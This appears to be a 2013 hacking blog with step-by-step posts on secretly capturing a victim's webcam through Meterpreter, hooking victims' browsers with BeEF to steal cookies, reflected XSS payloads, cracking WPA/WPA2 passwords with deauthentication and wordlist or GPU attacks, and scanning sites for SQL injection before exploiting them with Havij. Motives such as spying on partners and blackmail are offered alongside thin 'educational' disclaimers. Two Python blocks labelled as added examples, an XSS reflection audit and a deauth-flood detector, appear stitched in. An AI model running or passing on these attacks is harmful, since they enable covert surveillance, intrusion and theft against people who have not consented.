Welcome to XnonymouX Blog


Friday, 22 February 2013

How to Secretly Hack Into, Switch On, & Watch Anyone's Webcam Remotely

By on 22:53

Welcome back,

Like in my last article on remotely installing a keylogger onto somebody's computer, this guide will continue to display the abilities of Metasploit's powerful Meterpreter by hacking into the victim's webcam. This will allow us to control the webcam remotely, capturing snapshots from it.

Pic : http://bit.ly/Yrfb0G

Why exactly would you want to hack into somebody's webcam? Maybe you suspect your significant other of having a fling. Or, maybe you're into blackmailing. Or, maybe you're just a creep. But the real purpose is to show just how easy it is, so you're aware that it can be done—and so you can protect yourself against it.

Pic : http://bit.ly/XQsdF5


Unlike just installing a command shell on the victim computer, the Meterpreter has the power to do numerous and nearly unlimited things on the target's computer. The key is to get the Meterpreter installed on their system first.

Pic : http://bit.ly/Zx6icF

So, now let’s fire up Metasploit and install Meterpreter on the victim's system. Once we have done that, we can then begin to view and capture images from their webcam.

Step 1: List the Victim's Webcams

Metasploit's Meterpreter has a built-in module for controlling the remote system's webcam. The first thing we need to do is check whether there is a webcam and, if there is, get its name. We can do that by typing:

meterpreter > webcam_list

If he/she has a webcam, the system will come back with a list of all the webcams.

Step 2: Snap Pictures from the Victim's Webcam

Now that we know he/she has a webcam, we can take a snapshot from it by typing:

meterpreter > webcam_snap

The system will now save a snapshot from her webcam onto our system in the directory /opt/framework3/msf3, which we can open to see what's going on.

Pic : http://bit.ly/15AMmGq

The quality of the image saved all depends on your victim's webcam and surroundings.

Step 3: Watch Streaming Video from the Victim's Webcam

Now that we know how to capture a single snapshot from the victim's webcam, we will want to run the webcam so that we can watch a continuous video stream. We can do this by typing:

meterpreter > run webcam -p /var/www

This command starts his/her webcam and sends its streaming output to /var/www/webcam.htm.

How to Protect Yourself from Webcam Intrusion:

So, what can you do to make sure no one is peeking in on your habits in front of the computer? The easiest solution—cover your webcam up. Some laptops with built-in webcams actually have a slide cover you can use.

Pic : http://bit.ly/Wf27Ml

If that's not the case, a piece of non-translucent tape should do the trick, unless you want to buy one of these or these things. And if you still have one of those old-school USB webcams, simply unplug it.

We will continue to explore fun ways we can use the Meterpreter in the near future, so make sure to come back for more!

Hacking a Web-browser with beef

By on 01:49


The Browser Exploitation Framework (BeEF) is mainly used to exploit a web browser. When I was trying it, I played various pranks on the victim's browser, like opening a pop-up window, playing a sound, stealing cookies, etc. So let's start hacking.
Follow all the steps according to my post ======>

1. First install BeEF by clicking on Applications->Backtrack->Exploitation Tools->Social Engineering Tools->BEEF XSS Framework->BeEF Installer.

2. Once BeEF is installed, open it from the same menu as in step 1: click on BeEF and it will start connecting.

3. Now open the URL written next to the hook URL, as shown in the image.

4. After opening the link you will see a login page; enter username beef and password beef to log in.

5. A window will now open showing the BeEF control panel; this is where the main exploitation starts.

6. Now send this link http://127.0.0.1:3000/demos/basic.html to the victim.

7. Once the victim opens it, you will be connected to their computer through their browser, and the connected browsers will be listed on the left under the Online Browsers tab, as in the image.

8. Click on any browser in the Online Browsers tab and you will get a page with full information about that browser.

9. Then click on the Commands tab to open the various exploits and tools.

10. Now use any of the commands to play pranks on the victim.

Note ---> it's for educational purposes only.
While doing all this, don't close the terminal that opens when BeEF starts.

Tuesday, 19 February 2013

Non-Persistent XSS Attack

By on 06:26

Non-persistent XSS is actually the most common vulnerability that can be found on the Net.

It's commonly named "non-persistent" because it works on an immediate HTTP response from the victim website: it shows up when the web page takes the data provided by the attacker's client to automatically generate a result page for the attacker himself. Based on this, the attacker could provide some malicious code and try to make the server echo it back so that it gets executed, in order to obtain some result.

The most common place for this kind of vulnerability is a website's search engine: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will render those HTML entities.

Simply put, cross-site scripting involves the injection of malicious code into a website. It is the most common method of attack at the moment, as most large sites will contain at least one XSS vulnerability. However, there is more than one type of XSS. The most commonly found is referred to as "non-persistent" XSS.

Non-Persistent XSS

Non-persistent, as the title suggests, means that the injected script isn't permanent and just appears for the short time the user is viewing the page. The best example of this is a basic search engine coded for a site. Say, for example, the site search script is in this format:

Site.com/search.php?search=text here

Once something has been searched for, the script may display on the page something along the lines of:

"Results for text here"

simply echoing your search string straight onto the page without performing any validation checks.

What if we were to alter the search string to display HTML or JavaScript? For example:

Site.com/search.php?search=<font color=red>XSS</font>

Site.com/search.php?search=<script>alert("XSS");</script>

If no sanitization checks are being performed by the search script, this will just be echoed straight onto the page, therefore displaying an alert or red text. If there is no limit to the size, this could be used to display anything you want.

However, since the attacker can only display code on their own pages, this isn't much of a threat to other users. Although if the string were turned into hex, the search string would be slightly more hidden, and with a little deception it could be used to trick users into thinking the link is legitimate.
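Added example (not the post's own code): the unvalidated search echo the post describes next to its escaped version, in Python, with a check for whether a payload comes back unescaped. The host site.example, the function names and the request list are constructed placeholders.

```python
import html
from urllib.parse import urlsplit, unquote_plus

# Placeholder host standing in for the post's "Site.com" (assumption, not a real site)
BASE = "http://site.example/search.php?search="

def search_param(url):
    """Return the ?search= value the way the server sees it: percent-decoded."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == "search":
            return unquote_plus(value)
    return ""

def render_unsafe(query):
    """The post's vulnerable search.php: echoes the string straight into the page."""
    return f"<h2>Results for {query}</h2>"

def render_safe(query):
    """Fix: HTML-escape request data before it lands in the page body."""
    return f"<h2>Results for {html.escape(query, quote=True)}</h2>"

def reflected_unescaped(page, query):
    """True when query text containing markup appears verbatim (unescaped) in the page."""
    return query in page and html.escape(query, quote=True) != query

# Constructed requests: the post's two payloads, plus the script one percent-encoded
# ("turned into hex") to show that decoding happens before rendering either way.
REQUESTS = [
    BASE + "<font color=red>XSS</font>",
    BASE + '<script>alert("XSS");</script>',
    BASE + "%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E",
]

def audit(urls=REQUESTS):
    """Return [(decoded query, reflected by unsafe page, reflected by safe page)]."""
    return [(q, reflected_unescaped(render_unsafe(q), q),
                reflected_unescaped(render_safe(q), q))
            for q in map(search_param, urls)]

if __name__ == "__main__":
    for q, unsafe, safe in audit():
        print(f"{q!r}: unsafe page reflects={unsafe}, escaped page reflects={safe}")
```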


Note: This tutorial is only for educational purposes. I do not take any responsibility for any misuse; you will be solely responsible for any misuse you do. Hacking email accounts is a criminal activity and is punishable under cyber crime law, and you may get up to 40 years of imprisonment if caught doing so.

How to hack WPA / WPA2 password

By on 00:31



Don't crack any wifi router without authorization; otherwise, you will be put in jail.

Step 1:

airmon-ng

The result will be something like:

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

Step 2:

airmon-ng start wlan0

Step 3 (Optional):

Change the MAC address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4:

airodump-ng mon0

Then press Ctrl+C to stop the program.

Step 5:

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

where:
 -c is the channel
 -w is the file to be written
 --bssid is the BSSID

Leave this terminal running.

Step 6:

Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

where:
 -a is the BSSID
 -c is the client MAC address (STATION)

Wait for the handshake.

Step 7:

Use the John the Ripper word list to crack the WPA/WPA2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional):

If you do not want to use the John the Ripper word list, you can use Crunch.

Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

where 8 16 is the password length range, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have an nVidia card with CUDA, you can use pyrit together with crunch to crack the password.

Step a:

airmon-ng

The result will be something like:

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

Step b:

airmon-ng start wlan0

Step c (Optional):

Change the MAC address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d:

airodump-ng mon0

Then press Ctrl+C to stop the program.

Step e:

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f:

Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

where:
 -a is the BSSID
 -c is the client MAC address (STATION)

Wait for the handshake.

Step g:

If the following programs are not yet installed, install them.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h:

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i:

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j:

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

where 8 16 is the password length range, i.e. from 8 characters to 16 characters.

Step k (Optional):

If you encounter an error when reading wpacrack-01.cap, do the following.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

where 8 16 is the password length range, i.e. from 8 characters to 16 characters.

Step l:

Then you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks:

If you have an nVidia GeForce GTX460 (336 CUDA cores), the cracking speed is about 17,000 passwords per second.

To test whether your wireless card (either USB or PCI-e) can do injection or not:

airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0

Make sure pyrit works on your system:

pyrit list_cores
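A defender's counterpart to the deauthentication step (aireplay-ng -0) in the procedure above, added here as an example and not part of the original post: a minimal Python parser for raw 802.11 management frames that reports a source address sending a burst of deauth frames, which is what a forced handshake capture looks like on the air. It assumes frames without a radiotap header; the addresses, timestamps and threshold are constructed placeholders.

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame control byte 0: type 0 (management), subtype 12 (deauthentication)
def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)

def build_deauth(dst, src, bssid, reason=7):
    """Constructed sample frame: raw 802.11 deauth, no radiotap header (assumption)."""
    header = bytes([DEAUTH_FC0, 0x00]) + b"\x3a\x01" + dst + src + bssid + b"\x00\x00"
    return header + struct.pack("<H", reason)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason_code) for a deauth frame, else None."""
    if len(frame) < 26 or (frame[0] & 0xFC) != DEAUTH_FC0:
        return None
    dst, src, bssid = (mac_str(frame[i:i + 6]) for i in (4, 10, 16))
    return dst, src, bssid, struct.unpack_from("<H", frame, 24)[0]

def deauth_bursts(frames, window=2.0):
    """frames: (timestamp_seconds, raw_frame) pairs in time order.
    Returns {source_mac: peak count of deauths seen within any `window` seconds}."""
    recent, peak = defaultdict(deque), defaultdict(int)
    for ts, raw in frames:
        parsed = parse_deauth(raw)
        if parsed is None:
            continue  # beacons, data frames, etc. are not counted
        src = parsed[1]
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        peak[src] = max(peak[src], len(q))
    return dict(peak)

def flood_alerts(frames, threshold=10, window=2.0):
    """Sources whose deauth burst reached the threshold: the signature of a forced handshake."""
    return {src: n for src, n in deauth_bursts(frames, window).items() if n >= threshold}

# Constructed capture with locally administered (02:...) addresses, not real devices.
AP = bytes.fromhex("020000000001")
CLIENT = bytes.fromhex("020000000002")
BEACON = bytes([0x80, 0x00]) + b"\x00\x00" + b"\xff" * 6 + AP + AP + b"\x00\x00"

def sample_capture():
    frames = [(0.0, BEACON), (0.1, build_deauth(CLIENT, AP, AP, reason=3))]  # one ordinary deauth
    # Then a burst like the aireplay-ng -0 step: many deauths with the AP's address as source
    frames += [(10.0 + i * 0.01, build_deauth(CLIENT, AP, AP)) for i in range(64)]
    return frames
```

Feeding a real capture means stripping the radiotap header first and reading the timestamps from the pcap record, which this constructed sample skips.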


Monday, 18 February 2013

Facebook Fan Pages Attack

By on 21:17

Sunday, 17 February 2013

SQLSentinel: SQL Injection Vulnerability Scanner

By on 23:54


Hey friends, this is D@rk TruTH. Sorry for posting very late; I was busy with my studies because my exams are coming.
Today I am bringing a new SQL injection hunter tool named SQLSentinel.

What is SQLSentinel -->

This tool is very good if you want to test whether a site is vulnerable to SQL injection.
The tool first uses a crawling function to find links like index.php?id= and then checks whether these links are vulnerable or not.
It only finds vulnerabilities; it does not exploit them.

Usage of tool --->

1. First download it from here

2. Open the .zip file and click on sqlsentinel.jar; it will open, but make sure you have Java installed.

3. After opening it, add the website URL in the Url box and click Start.

4. If it finds some vulnerabilities, it will show them in the Working logs text box, like the ones I got in the image given below.


5. Use Havij or any other SQL injection tool to hack the website.

Note:-->
Only for educational purposes.